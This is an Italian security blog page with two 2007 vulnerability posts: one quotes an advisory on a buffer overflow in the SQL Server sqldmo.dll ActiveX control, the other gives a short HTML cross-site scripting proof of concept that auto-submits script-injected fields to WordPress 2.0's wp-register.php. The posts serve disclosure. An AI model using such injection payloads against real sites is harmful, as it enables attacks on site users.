Posts Tagged “Untitled”

23 09 2007

Microsoft SQL Server sqldmo.dll ActiveX Buffer Overflow Vulnerability

Posted by: Andrea L. in sicurezza

Incuriosito dai commenti di un mio precedente post mi sono messo a fare un pò di ricerca in merito, direte voi ma la mattina non hai niente da fare???

Intanto cominio col dire che “mi sono sbagliato”. Perché la vulnerabilità che ho segnalato è si del 2000, perché il componente che ne “soffre” è del 2000 :)

Tale DLL è stata ereditata, pari pari, nella nuova versione di Sql Server 2005, espandendo la vulnerabilità anche a questa fascia di prodotti.

L’advisor recita così:

Microsoft SQL Server ’sqldmo.dll’ ActiveX Control is prone to a buffer-overflow vulnerability because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

[From Microsoft SQL Server sqldmo.dll ActiveX Buffer Overflow Vulnerability]

Dettagli:

Bugtraq ID: 25594

Class: Boundary Condition Error

CVE:

Remote: Yes

Local: No

Published: Sep 07 2007 12:00AM

Updated: Sep 13 2007 12:40PM

Credit: rgod is credited with the discovery of this vulnerability.

Vulnerable: Microsoft SQL Server 2005 SP2

[From Microsoft SQL Server sqldmo.dll ActiveX Buffer Overflow Vulnerability]

Di seguito trovare le 3 PoC: La uno, la due e la TRE (l’originale)!

Tags: , , ,

Comments No Comments »

22 09 2007

WordPress wp-register.php Multiple Cross-Site Scripting Vulnerabilities

Posted by: Andrea L. in sicurezza

Ritengo scortese pubblicare questo genere di informazioni soprattutto quando si parla del “padrone di casa” … ma tutto sommato … la sicurezza è un processo aperto e condiviso.

Bugtraq ID: 25769

Class: Input Validation Error

CVE: Remote: Yes Local: No

Published: Sep 22 2007 12:00AM

Updated: Sep 22 2007 12:00AM

Credit: Adrian Pastor is credited with the discovery of these vulnerabilities.

Vulnerable: WordPress WordPress 2.0

Ed ecco la PoC

[sourcecode language='xml']
<html>
<head></head>
<body>

<form method=”post” action=”http://target/wordpress/wp-register.php” >
<input type=”hidden” name=”action” value=”register” />
<input type=”hidden” name=”user_login” id=”user_login”
value=’”><script>alert(1)</script>’ />
<input type=”hidden” name=”user_email” id=”user_email”
value=’”><script>alert(2)</script>’ />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>[/sourcecode]

[From WordPress wp-register.php Multiple Cross-Site Scripting Vulnerabilities]

Tags: , ,

Comments No Comments »